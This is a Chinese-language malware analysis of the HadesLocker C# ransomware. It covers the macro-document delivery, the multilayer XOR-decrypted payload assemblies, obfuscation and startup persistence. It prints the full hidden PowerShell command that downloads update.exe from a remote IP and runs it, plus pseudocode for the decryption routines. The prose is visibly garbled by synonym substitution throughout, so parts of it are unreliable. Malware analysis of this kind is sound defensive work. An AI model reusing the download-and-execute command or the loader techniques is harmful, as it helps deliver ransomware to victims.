近日哈勃分析系统捕获到一类由C#语言编写的新的敲诈勒索木马。之前呈现 的C#语言编写的木马只是简单地挪用了一些C#库来帮助开发。与之对比，此次的变种增加了多层嵌套解密、动态反射挪用 等庞大手段，外加多种混淆技术， 提升了阐举事度。
木马加密文件时使用AES256算法， 在特定条件下可以还原加密的文件。
配景简介：
HadesLocker是10月份新发生发火的一个敲诈勒索类木马，会加密用户 特定后缀名的文件，包孕本地驱动器和网络驱动器， 加密后文件后缀为.~HL外加5个 随机字符，然后生成txt，html、png三种形式的文件来通知用户付出 赎金，桌面配景也会被改为生成的png文件。

打开付出赎金的网站可以看到，用户必需付出1比特币的赎金才华获取解密 暗码，并且如果在规定的时间内没有付出，赎金价格将升至2比特币 。在该网站上，木马作者将其定名为HadesLocker。此网站域名为俄罗斯顶级域名ru，无法盘问到进一步的注册信息。

样天职析：
原始流传文件依然延续了比来的趋势，使用宏文档进行流传，打开文档之后运行宏会 启动powershell命令，下载木马主体并且运行 ：
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.*.*.66/update.exe','C:\Users\ADMINI~1\AppData\Local\Temp\update345.exe'); Start-Process('C:\Users\ADMINI~1\AppData\Local\Temp\update345.exe')
此中的下载IP经盘问来自荷兰。
下载到的update345.exe是一个rar自解压 包，打开后可以看到包罗3个文件， 此中一个exe是木马启动入口，此外两个文件均是一些二进制数据。

Osiyykss.exe是一个C#措施，所有 的源码都颠末了混淆，主要包孕函数名与变量名混淆 ，执行流程混淆，外加垃圾指令等。
例如下面是此中一个较为简单的被混淆的要领：

可以看到混淆形式如下：
while(true)
{
switch()
case 1:
case 2：
……
}
使用此中硬编码的一些大数常量，然后 通过各类运算决定进哪个执行分支，以此 混淆执行流。因从此面可以看到，本文几乎所有截图中的代码 根基都在某个switch的case里。外加所有的字符串都是动态解密的，这 对静态分析造成了很大困扰，所以主要需要依靠动态调试这个样本。
Osiyykss.exe分析：
Osiyykss.exe启动后首先读取压缩包内的另一个文件Krrxoeoaonmsiyyk.png， 并且开始解密：

Krrxoeoaonmsiyyk.png解密后是一个C#措施集，解密 要领不算庞大，使用固定的字符串“Dlghooxwxclesvxamv” 为key，然后挨次异或加密。由此可得到 解密算法为：
For i in FileSize:
FileBytes[i] ^= Key[ i % KenLen ];
解密后的措施集是这样的：

解密后Osiyykss.exe使用延迟绑定技术动态挪用 这个名为”IE”的措施集：

IE措施集：
首先木马将自身复制到AppData\Roaming\wow6232node目录 下，此目录名怀疑是仿照系统中常见的WOW6432Node的名称。

然后创建一个快捷方法，指向wow6232node目录下的 新文件，并且将快捷方法设置为自启动项。

接下来读取压缩包的另一个文件Senagxehdojk.xml，并且挪用IE:PolyDecrypt开始解密 ，解密的key与之前解密IE措施集的key一样 ，但是解密要领略有差别，解密算法大意如下：
For i in FileSize*2:
FileBytes[i % FileSize] = (BYTE)(((int)((FileBytes[i % FileSize] ^ Key[i % KeyLen]) - FileBytes[(i + 1) % FileSize]) + 256) % 256);

Senagxehdojk.xml解密后为另一个措施集S oftware，这个措施集才是敲诈木马实现 加密勒索的主要措施集，但木马十分狡猾，并没有直接挪用该措施集。